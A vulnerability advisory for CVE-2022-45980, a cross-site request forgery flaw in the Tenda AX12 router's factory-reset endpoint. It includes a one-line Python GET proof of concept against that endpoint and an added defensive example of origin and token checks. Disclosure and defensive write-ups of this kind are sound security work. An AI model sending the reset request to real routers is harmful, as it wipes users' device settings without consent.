Headline
CVE-2022-45980: IOT-CVE/Tenda/AX12/6 at master · The-Itach1/IOT-CVE
Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via /goform/SysToolRestoreSet.
Vulnerability description
Affected device: Tenda AX12 V22.03.01.21_CN (https://www.tenda.com.cn/download/detail-3237.html)
Vulnerability type: Cross-Site Request Forgery (CSRF)
Impact: Device reset to factory settings
Vulnerability cause
The /goform/SysToolRestoreSet interface restores the device to factory settings for any authenticated session. Because the request carries no anti-CSRF protection, a remote attacker can cause an authenticated user's browser to issue it.
POC
With an authenticated session, simply requesting this interface triggers the reset:
import requests

# "ip" is a placeholder for the device's LAN address
url = "http://ip/goform/SysToolRestoreSet"
r = requests.get(url)
print(r.content)
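For contrast with the cause and the PoC above, here is an added illustrative example (Python, not Tenda's firmware code) of the checks a state-changing handler like /goform/SysToolRestoreSet would need to reject a forged request; the device LAN address, the form field name and the token handling are assumptions.

```python
"""Added example: rejecting cross-site requests to a factory-reset handler.
Illustrative only; header names are standard HTTP, everything else is assumed."""
import hmac
import secrets
from urllib.parse import urlsplit

DEVICE_HOST = "192.168.0.1"  # assumed LAN address of the router (constructed for the demo)


def issue_csrf_token():
    """Per-session secret that only pages served by the device itself can embed."""
    return secrets.token_urlsafe(16)


def request_source_host(headers):
    """Hostname of the page that issued the request, or None when unknown.
    Browsers attach Origin to cross-origin POSTs; Referer is the fallback."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return None
    return urlsplit(src).hostname


def check_reset_request(method, headers, form, expected_token):
    """Return (allowed, reason) for a factory-reset request.

    Three independent checks, all of which the vulnerable endpoint lacks:
    1. a state change must not be reachable over GET (the PoC is a bare GET);
    2. the request must originate from the device's own UI, failing closed
       when neither Origin nor Referer is present;
    3. the form must carry the per-session CSRF token in constant-time compare.
    """
    if method != "POST":
        return False, "state change requested over GET"
    host = request_source_host(headers)
    if host != DEVICE_HOST:
        return False, f"cross-site or unknown origin: {host}"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, expected_token):
        return False, "missing or wrong CSRF token"
    return True, "ok"


if __name__ == "__main__":
    tok = issue_csrf_token()
    # Bare GET, as in the PoC: rejected before any origin or token check.
    print(check_reset_request("GET", {}, {}, tok))
    # Legitimate submission from the device's own settings page: allowed.
    ok_hdrs = {"Referer": f"http://{DEVICE_HOST}/index.html"}
    print(check_reset_request("POST", ok_hdrs, {"csrf_token": tok}, tok))
```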